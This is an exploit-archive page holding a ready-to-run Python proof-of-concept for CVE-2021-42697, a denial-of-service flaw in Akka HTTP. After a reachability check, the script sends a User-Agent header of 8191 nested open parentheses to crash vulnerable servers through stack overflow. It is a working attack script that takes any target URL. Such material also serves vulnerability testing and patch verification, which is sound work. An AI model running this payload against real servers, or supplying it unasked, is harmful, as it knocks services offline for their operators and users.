Akka HTTP 10.1.14 Denial Of Service

Akka HTTP 10.1.14 Denial Of Service: Posted May 11, 2022; Authored by cxosmo; Akka HTTP version 10.1.14 suffers from a denial of service vulnerability.; tags | exploit, web, denial of service; advisories | CVE-2021-42697; SHA-256 | 30ba845af8fffb67fd508290e5e3f00582f741016d66ed94f4ec2cfe0357030c; Download | Favorite | View

Akka HTTP 10.1.14 Denial Of Service

# Exploit Title: Akka HTTP Denial of Service via Nested Header Comments
# Date: 18/4/2022
# Exploit Author: cxosmo
# Vendor Homepage: https://akka.io
# Software Link: https://github.com/akka/akka-http
# Version: Akka HTTP 10.1.x < 10.1.15 & 10.2.x < 10.2.7
# Tested on: Akka HTTP 10.2.4, Ubuntu
# CVE : CVE-2021-42697

import argparse
import logging
import requests

# Logging config
logging.basicConfig(level=logging.INFO, format="")
log = logging.getLogger()

def send_benign_request(url, verify=True):
    log.info(f"Sending benign request to {url} for checking reachability...")
    try:
        r = requests.get(url)
        log.info(f"Benign request returned following status code: {r.status_code}")
        return True
    except Exception as e:
        log.info(f"The following exception was encountered: {e}")
        return False

def send_malicious_request(url, verify=True):
    log.info(f"Sending malicious request to {url}")
    # Akka has default HTTP header limit of 8192; 8191 sufficient to trigger stack overflow per 10.2.4 testing
    nested_comment_payload = "("*8191
    headers = {'User-Agent': nested_comment_payload}
    try:
        r = requests.get(url, headers=headers)
        log.info(f"Request returned following status code: {r.status_code}")
    # Expected exception to be returned if server is DoSed successfully
    except requests.exceptions.RequestException as e:
        if "Remote end closed connection without response" in str(e):
            log.info(f"The server is unresponsive per {e}: DoS likely successful")
    except Exception as e:
        log.info(f"The following exception was encountered: {e}")

if __name__ == "__main__":
    # Parse command line
    parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter)
    required_arguments = parser.add_argument_group('required arguments')
    required_arguments.add_argument("-t", "--target",
                        help="Target URL for vulnerable Akka server (e.g. https://localhost)",
                        required="True", action="store")
    parser.add_argument("-k", "--insecure",
                        help="Disable verification of SSL/TLS certificate",
                        action="store_false", default=True)
    args = parser.parse_args()

    # Send requests: first is connectivity check, second is DoS attempt
    if send_benign_request(args.target, args.insecure):
        send_malicious_request(args.target, args.insecure)

Top Authors In Last 30 Days

Red Hat 228 files
Ubuntu 89 files
Gentoo 31 files
Debian 22 files
tmrswrr 10 files
Sina Kheirkhah 7 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
Google Security Research 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,079)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,380)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,289)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,663)
UNIX (9,426)
UnixWare (187)
Windows (6,666)
Other

Akka HTTP 10.1.14 Denial Of Service

Akka HTTP 10.1.14 Denial Of Service

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Akka HTTP 10.1.14 Denial Of Service

Share This

Akka HTTP 10.1.14 Denial Of Service

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems